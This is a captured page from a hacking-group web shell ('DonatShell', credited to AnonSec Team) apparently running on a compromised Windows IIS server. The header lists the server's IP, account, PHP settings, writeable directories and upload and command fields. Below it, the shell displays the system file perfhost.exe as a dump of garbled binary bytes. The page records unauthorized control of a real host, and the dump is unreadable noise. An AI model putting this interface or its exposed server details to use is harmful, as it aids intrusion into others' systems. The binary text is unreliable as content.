DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.127
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/System32/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Windows/System32/perfhost.exe
MZ@	!L!This program cannot be run in DOS mode.

$wL___Vϝ^Vό^_Vϊ@VϚFVύ^Vψ^Rich_PEL[J	. -@@ |2@Pp(@ptp.text&-. `.data@4@.rsrcP6@@.relochpN@Bo[J[J[J[J[J[J[J([JQ[Jz[J[J[J[J[J[J[J+[J[JQmsvcrt.dllntdll.dllRPCRT4.dllAPI-MS-Win-Core-ErrorHandling-L1-1-0.dllAPI-MS-Win-Core-Heap-L1-1-0.dllAPI-MS-Win-Core-Interlocked-L1-1-0.dllAPI-MS-Win-Core-LibraryLoader-L1-1-0.dllAPI-MS-Win-Core-LocalRegistry-L1-1-0.dllAPI-MS-Win-Core-Misc-L1-1-0.dllAPI-MS-Win-Core-ProcessThreads-L1-1-0.dllAPI-MS-Win-Core-Profile-L1-1-0.dllAPI-MS-Win-Core-Synch-L1-1-0.dllAPI-MS-Win-Core-SysInfo-L1-1-0.dllAPI-MS-Win-Core-ThreadPool-L1-1-0.dllAPI-MS-WIN-Service-Core-L1-1-0.dlloλoo|No7oouo6oQoowo'o'o(ooo'>oaoUw`UwUwUw6wZw1w ww:wIwTw`Rwnw+,.[J%pp{|
N,5>}O5+wB1wvw!0
i
i
kk
i


[l
2m
)www&ww	
w#
wPwwA$wwk
@g
=mw9owq
hλw2w}w~wwmw@&wow{w;wsw>twBw%мwoλoo|No7oouo6oQoowo'o'o(ooo'>oaoUw`UwUwUw6wZw1w ww:wIwTw`Rwnw+,.[J%pp{|
N,5>

]+H`222T%"V#0%\0M\)T)T[0%%p+h2@FAph0L@@GCP!Dph08@DARp.pt2D;ơ}[Nko]+H`dPerfpSetServiceStatePerfpServiceMainPerfHostwmainPerfpOpenProviderPerfCollectDataExportLinkageCollectQueryCloseOpenLibraryPerformancePerfpRpcIfCallbackSOFTWARE\Microsoft\Windows NT\CurrentVersion\PerflibncalrpcPerfpCleanupServerPerfpGetClientAuthIdSYSTEM\CurrentControlSet\Services\%s\%s@@H(@RSDSyڱOLqmuPerfHost.pdb/U}VWP@t&V@E@E@EV@<V8h@5D@V4_^u*jh<EjEPjhE3]B
jjjjZ5H@%D@%H@̋USV@@V@38L@t>EHttHtjx[+SSSSSSjjL@5H@V<^[]̋UQS3Sh}hhL@D@;uE4SSjjE;u"SShIH@;tE;tkjhTjEPjh
9D@tSV@@V@VL@<uSjjH@D@^;tPH@Sjjj[̋UV3VVjVEhEuu hCVVhH;ƉE^uLEPu*jh|EjEPjh
E5C5CD3̋UVuv4@f4F0^]̋UVu~0t3kWjjv<F4t1v=DP׉F8tv v4׉F@tvv4׉F<uF4tP@f4F03_^]̋UQQSVuF WH@u+EFHf@@fuV+ȋxf@@fu+Nj}GWv L	QvDPRjh0 V@~ EǍH@u+EFHf@@fuV+ȋX]f@@fu+E]CSWL	QvDPRjEPjhQ(VF1g_^[̋UEPES]VW8C1t"jY{(u3tUSS0E@PE.Cp@u+ƉECHf@@fu+KQf1AAfus+t֍z}f:BBfu+UTjZu}GWsDPsD	PsRVjh<
(sS8jhE
{Ǎp@u+ƉECHf@@fuS+ȋpuf0@@fu+EuFVWL	QsDPRjEPjh	E(uEC(EC1C,3_^[̋UEP(]̋UV5 @W @uv YYt6;u3_^]V̋UQQE VuF$PE@VEBPE0FH@u+S؋FWHf@@fu+NQf9AAfu+ʋUtz}f:BBfu+UTjZ}uCSvDPvD	PvjuRWjh _0uEuPuV<jhE~ǍH@u+NEMAfAAfuv+ы΍AfAAfu+ȋE@PWDPuD	PVjEPjh(}_[tE u<E^̋Ud@0SV5LW}w3Spwd@0Spwd@0Spwd@0Spw d@0Spwd@0Spd@0WSp_^[]̋U(@3ʼnEESVW}hW3P3
;d@0jDSpP;uDžjDSV
F$PWFPF;WPh~
;vPFPP;XWPh;2PFPf;WPha;PF P";WPh;t&WPh;PFP;un=\hP;SFPSh9totfPf@@f;u+DPjPjh;tV9t\ $@F @05$@03M_^3[v̋USVu^W;~WGPS4;tl@F$PEӀ~1tV~0tVT@WӍFP,Wt5<uNH<V_^[]̋UQS@VWT@Vu}u"uEPEEtV<}'}V5<֍G$PWEG$Pփ}ttWEE83_^[̋UVu6&3^]̋USW3WWEPWEPuE;}sEEPuE;WWWEPWuEEP9}ujVuh YYEPF;^u	E>uE;u.EPhWh(hPjhEi9}t!jhjEPjhEu\3_[̋UQVWj5X@5@EtjWjEPjVhX@jj5@EtjWjEPjVL_^̋W3Wj
h;uihu#hj)WW5@;uKSVX@VWW;u!5X@5@;tVWW5@3^[_̋UEP]̋Uud@0jpP]̋Uud@0jpL]̋UEVuEEPVEPjuuXu$Er|0u}v
}w3^]̋UW};vv*VM` PPNu^PWu5C5CT_̋UQEtuEujPjhh̋U@julVEPjjjdjh|$EPj8EPj
u`u\}	VX}8sj
XEMȉM̉H3^̋UEPf@@fu+Vtd@0VjpPMujXVuP3^]̋UEP@uV+pd@0VjpPMujXVuP3^]̋UQV5TW3EPWWWu}u;tzued@0SuWpP;ujXBEPSuWuu֋;td@0SWpLEE;tM3[_^̋UMjXtvW|GES3Vt*UW++Ѝ7tftf@@Nu_uHHz3f^[]̋UMjXtvW|9SVW}EPuqVW3|;wu
z3fw_^[]̋U(@3ʼnEVuVhP}jzX?Pf@@fuMjQ+VPPjh}	PX3M3^̋U(@3ʼnEMEVuQPhhP}VjjPhPM3^̋UVuW}EPWEPjuuuTu0Er#3f;LGuEHtHuVWu	3_^]̋UVu3utу;ur^]̡@hp@5|@p@h`@hd@h\@l@jh 23ۉ]dp]CSVW4;t;u3Fuhd3FC;u
jY;Cu,5Chh|#YYtE5x@C;uhxhp%YYC9]uSW09CthCYt
SjSC5`@5d@5\@t@9h@u7PE	MPQYYËeEt@39h@uP9x@uEt@̸MZf9t3M<8PEuHtuՃv39xtv39jh@%P
C
CYY
@
@=8@uh/YM3;
(@u%%̋UE8csmu+xu%@= t=!t="t=@u,3]h-3%̋UMMZf9t3]ËA<8PEu3ҹf9H‹]̋UEH<ASVq3WDv}H;r	X;r
B(;r3_^[]jh@2eV\Yt=E+PVYYt+@$ЃE E3=ËeE3e%%h/d5D$l$l$+SVW(@1E3PeuEEEEdËMd
Y__^[]Q̋Uuuuuh-h(@L]hh$YY3jh`2L3MtDt?!EMZf9u+Q<|$s
E8PEt3@Ëe3EE?̋UjHt$Pt@\fujX]fu3@]ËE]̋U(@eeSWN@;t
t	У,@[VEPu3up3l33EPE3E3;t(@uO@5(@։5,@^_[̋U(A
AAA5A=|AfAf
AfxAftAf%pAf-lAAEAEAEA@A@@	@(@,@jh h	xPt%(%m,,./2060454r74h48393P9 39(3B:<4:P 4:d(4X;l<4;D4;L4 <X4<3=<<<888:9p9999:9
:.:z:::l::;;0;D;;;<;Z<D<r<78$8<87`8x88877N8|7785B5P5Z5l5v5~55555555,5,665:6T6n666666677&7@7T7_wcsicmpmemset_vsnwprintfmemcpy__wgetmainargs_cexitb_exitj_XcptFilterexit_initterm_amsg_exit__setusermatherr__p__commode__p__fmode__set_app_typemsvcrt.dll7?terminate@@YAXXZY_except_handler4_common'_controlfpVRtlReleaseSRWLockSharedERtlAcquireSRWLockSharedURtlReleaseSRWLockExclusiveDRtlAcquireSRWLockExclusive8EtwEventUnregister7EtwEventRegisterGRtlFreeHeapcRtlAllocateHeap9EtwEventWriteRtlNtStatusToDosErrorNtCloseNtQueryInformationTokenkNtOpenThreadToken RtlExpandEnvironmentStringsntdll.dllNdrServerCall2RpcImpersonateClientRpcStringFreeWRpcStringBindingParseWsRpcBindingToStringBindingWcRpcBindingInqAuthClientWRpcServerUnregisterIfuRpcBindingVectorFreeRpcEpUnregister~RpcEpRegisterWRpcServerInqBindingsRpcServerRegisterIfExRpcServerUseProtseqWRpcRevertToSelfRPCRT4.dllGetLastErrorSetUnhandledExceptionFilterUnhandledExceptionFilterAPI-MS-Win-Core-ErrorHandling-L1-1-0.dll
HeapSetInformationAPI-MS-Win-Core-Heap-L1-1-0.dllInterlockedIncrementInterlockedDecrementInterlockedCompareExchangeInterlockedExchangeAPI-MS-Win-Core-Interlocked-L1-1-0.dllFreeLibraryGetProcAddressLoadLibraryExWGetModuleHandleAAPI-MS-Win-Core-LibraryLoader-L1-1-0.dllRegCloseKeyRegOpenKeyExWRegQueryValueExARegQueryValueExWAPI-MS-Win-Core-LocalRegistry-L1-1-0.dllSleepAPI-MS-Win-Core-Misc-L1-1-0.dll
GetCurrentThreadIdGetCurrentProcessId*TerminateProcess
GetCurrentProcessAPI-MS-Win-Core-ProcessThreads-L1-1-0.dllQueryPerformanceCounterAPI-MS-Win-Core-Profile-L1-1-0.dllInitializeSRWLockAPI-MS-Win-Core-Synch-L1-1-0.dllGetTickCountGetSystemTimeAsFileTimeAPI-MS-Win-Core-SysInfo-L1-1-0.dll	CloseThreadpoolWork#SubmitThreadpoolWorkCreateThreadpoolWorkAPI-MS-Win-Core-ThreadPool-L1-1-0.dllSetServiceStatusRegisterServiceCtrlHandlerExWStartServiceCtrlDispatcherWAPI-MS-WIN-Service-Core-L1-1-0.dll @ @N@DL00H`x				 eW
T`Q
WEVT_TEMPLATEMUI<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="x86"
    name="Microsoft.Windows.Diagnosis.PerfHost"
    type="win32"
/>
<description>Performance Counter DLL Host</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="asInvoker"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
</assembly>
4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft CorporationbFileDescriptionx86 Performance Counter Hostl&FileVersion6.1.7600.16385 (win7_rtm.090713-1255):
InternalNameperfhost.exe.LegalCopyright Microsoft Corporation. All rights reserved.B
OriginalFilenameperfhost.exej%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	CRIM
{|
N,5>$WEVT
 CHAN|`Microsoft-Windows-Diagnosis-Perfhost/AnalyticTTBL
TEMP\0vJmD	EventDataA5oDataKNameError
A;oData#KNameFunction
ErrorFunctionTEMP,A5K/pe~AD	EventDataA5oDataKNameError
ACoData+KNameProviderName
,<Error ProviderNameTEMP%z{#˵w.D	EventDataAAoData)KNameReturnValue
A;oData#KNameProvider
AAoData)KNameProviderDll
A;oData#KNameFunction
,D`ReturnValueProviderProviderDllFunctionTEMP$Zg/;|2D	EventDataAEoData-KName
FirstArgument
A;oData#KNameProvider
AAoData)KNameProviderDll
A;oData#KNameFunction
0Ph FirstArgumentProviderProviderDllFunctionTEMP`,	l+*F2'{\D	EventDataA5oDataKNameQuery
A3oDataKNameSize
A;oData#KNameProvider
AAoData)KNameProviderDll
A;oData#KNameFunction
					QuerySizeProviderProviderDllFunctionTEMPx
O]n`LD	EventDataA;oData#KNameProvider
AAoData)KNameProviderDll
A;oData#KNameFunction
TlProviderProviderDllFunctionOPCOLEVLTASKKEYWX
errorscalloutsEVNT
0




\
x



	
D/n]]qW$r0%_q-Bif*WEVT_TEMPLATEMUIMUIen-USt111T2X2\2h2p2t2x2|2222233333$444 6$6d6h66666666667
777-7]7c7j7p7777777778	8888<8B8G8^8k8y888888888889999&90979G9Z9`9f99999:::u;;< <<<<<<6=N===>s>>>K?^??? @0D0000-141_111112F2W222222233333333 464A4H4\4i4444444444455(575=5H5O5]5c5i5v5~5555666666777<7G7R77848i88l999:):?:u::;";(;-;2;7;<;B;J;W;r;{;;;;;;;;;;;	<< <'<;<A<G<M<Z<`<i<<<<<<<<<<$=0=6===F=L=T=Z=g=o=u=====>> >>>,?8?E?b?????0h[000000001113191?1E1K1Q1X1_1f1m1t1{11111111111111112224282T2X2t2x2@0 0$0

Anon7 - 2022
AnonSec Team